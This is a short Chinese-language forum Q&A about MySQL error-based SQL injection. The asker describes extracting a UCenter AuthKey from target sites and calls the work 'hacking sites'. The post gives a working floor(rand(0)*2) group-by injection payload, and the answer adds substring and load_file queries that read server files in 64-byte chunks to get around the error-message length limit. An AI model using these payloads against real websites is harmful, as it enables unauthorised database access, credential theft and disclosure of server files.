關(guān)于Mysql報錯注入的幾個問題

No.1：Mysql報錯注入最多能夠顯示多少字節(jié)呢？我Inject到的UC的AuthKey爆出62位一共應該64位

No.2:爆出的用戶名中文和特殊符號顯示亂碼，用Hex()轉(zhuǎn)換了下爆出來再轉(zhuǎn)回去的時候依然亂碼,怎么解決？你知道國內(nèi)很多SB愛用各種怪異的符號做用戶名,嚴重影響日站的進度。。

No.3：能否用報錯注入Load_File(),我沒有成功語句如下：

and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

1. 64 位，但是許多報錯注入都會在前后加上特別符號，以方便分辨，如[]，就變成62位了，可以使用substring來處理

2. 如圖：

3. 同樣使用substring 以64為1單位慢慢讀, 最好就是寫個循環(huán)來讀

Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1

Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1

Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1